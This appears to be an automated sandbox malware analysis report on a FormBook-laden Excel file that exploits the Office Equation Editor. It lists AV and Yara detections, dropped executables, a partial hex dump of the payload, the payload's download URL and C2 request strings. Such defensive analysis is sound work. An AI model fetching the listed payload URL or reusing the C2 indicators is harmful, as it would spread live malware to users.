Analysis Report Request for quotation.xlsx

AV Detection:

Antivirus detection for URL or domain

Source: http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: TR/AD.Swotter.yiimo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe	Avira: detection malicious, Label: TR/AD.Swotter.yiimo

Multi AV Scanner detection for domain / URL

Source: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe	ReversingLabs: Detection: 33%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 33%

Multi AV Scanner detection for submitted file

Source: Request for quotation.xlsx	Virustotal: Detection: 33%			Perma Link
Source: Request for quotation.xlsx	ReversingLabs: Detection: 22%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.vbc.exe.400000.2.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,		9_2_4A556E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,		9_2_4A552E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,		9_2_4A570202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,		9_2_4A56BF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,		9_2_4A55BBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,		9_2_4A570492

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		7_2_0040E451
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then mov edi, edi		9_2_4A55C02E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi		9_2_0008E451

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:27:54 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 20:54:09 GMTETag: "eb000-5b47bede9f95e"Accept-Ranges: bytesContent-Length: 962560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 0

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive

Downloads files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Found strings which match to known social media urls

Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu

Urls found in memory or binary data

Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419D60 NtCreateFile,		7_2_00419D60
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419E10 NtReadFile,		7_2_00419E10
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419E90 NtClose,		7_2_00419E90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419F40 NtAllocateVirtualMemory,		7_2_00419F40
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419E0A NtReadFile,		7_2_00419E0A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00419E8F NtClose,		7_2_00419E8F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A300C4 NtCreateFile,LdrInitializeThunk,		7_2_00A300C4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A30078 NtResumeThread,LdrInitializeThunk,		7_2_00A30078
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A30048 NtProtectVirtualMemory,LdrInitializeThunk,		7_2_00A30048
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2F9F0 NtClose,LdrInitializeThunk,		7_2_00A2F9F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2F900 NtReadFile,LdrInitializeThunk,		7_2_00A2F900
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_00A2FAE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_00A2FAD0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_00A2FBB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_00A2FB68
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FC90 NtUnmapViewOfSection,LdrInitializeThunk,		7_2_00A2FC90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_00A2FC60
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FD8C NtDelayExecution,LdrInitializeThunk,		7_2_00A2FD8C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_00A2FDC0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FEA0 NtReadVirtualMemory,LdrInitializeThunk,		7_2_00A2FEA0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_00A2FED0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FFB4 NtCreateSection,LdrInitializeThunk,		7_2_00A2FFB4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A30060 NtQuerySection,		7_2_00A30060
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A301D4 NtSetValueKey,		7_2_00A301D4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3010C NtOpenDirectoryObject,		7_2_00A3010C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A307AC NtCreateMutant,		7_2_00A307AC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A30C40 NtGetContextThread,		7_2_00A30C40
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A310D0 NtOpenProcessToken,		7_2_00A310D0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A31148 NtOpenThread,		7_2_00A31148
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2F8CC NtWaitForSingleObject,		7_2_00A2F8CC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A31930 NtSetContextThread,		7_2_00A31930
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2F938 NtWriteFile,		7_2_00A2F938
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FAB8 NtQueryValueKey,		7_2_00A2FAB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FA20 NtQueryInformationFile,		7_2_00A2FA20
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FA50 NtEnumerateValueKey,		7_2_00A2FA50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FBE8 NtQueryVirtualMemory,		7_2_00A2FBE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FB50 NtCreateKey,		7_2_00A2FB50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FC30 NtOpenProcess,		7_2_00A2FC30
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FC48 NtSetInformationFile,		7_2_00A2FC48
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A31D80 NtSuspendThread,		7_2_00A31D80
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FD5C NtEnumerateKey,		7_2_00A2FD5C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FE24 NtWriteVirtualMemory,		7_2_00A2FE24
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FFFC NtCreateProcessEx,		7_2_00A2FFFC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A2FF34 NtQueueApcThread,		7_2_00A2FF34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A571E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,		9_2_4A571E5F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A56F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,		9_2_4A56F6CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,		9_2_4A55C2A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,		9_2_4A55C48A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A5618A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,		9_2_4A5618A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55C52D NtQueryInformationToken,		9_2_4A55C52D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022900C4 NtCreateFile,LdrInitializeThunk,		9_2_022900C4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022907AC NtCreateMutant,LdrInitializeThunk,		9_2_022907AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FAE8 NtQueryInformationProcess,LdrInitializeThunk,		9_2_0228FAE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FB68 NtFreeVirtualMemory,LdrInitializeThunk,		9_2_0228FB68
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FB50 NtCreateKey,LdrInitializeThunk,		9_2_0228FB50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FBB8 NtQueryInformationToken,LdrInitializeThunk,		9_2_0228FBB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228F900 NtReadFile,LdrInitializeThunk,		9_2_0228F900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228F9F0 NtClose,LdrInitializeThunk,		9_2_0228F9F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		9_2_0228FED0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FFB4 NtCreateSection,LdrInitializeThunk,		9_2_0228FFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FC60 NtMapViewOfSection,LdrInitializeThunk,		9_2_0228FC60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FD8C NtDelayExecution,LdrInitializeThunk,		9_2_0228FD8C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FDC0 NtQuerySystemInformation,LdrInitializeThunk,		9_2_0228FDC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02290060 NtQuerySection,		9_2_02290060
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02290078 NtResumeThread,		9_2_02290078
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02290048 NtProtectVirtualMemory,		9_2_02290048
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229010C NtOpenDirectoryObject,		9_2_0229010C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022901D4 NtSetValueKey,		9_2_022901D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02290C40 NtGetContextThread,		9_2_02290C40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022910D0 NtOpenProcessToken,		9_2_022910D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02291148 NtOpenThread,		9_2_02291148
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FA20 NtQueryInformationFile,		9_2_0228FA20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FA50 NtEnumerateValueKey,		9_2_0228FA50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FAB8 NtQueryValueKey,		9_2_0228FAB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FAD0 NtAllocateVirtualMemory,		9_2_0228FAD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FBE8 NtQueryVirtualMemory,		9_2_0228FBE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228F8CC NtWaitForSingleObject,		9_2_0228F8CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228F938 NtWriteFile,		9_2_0228F938
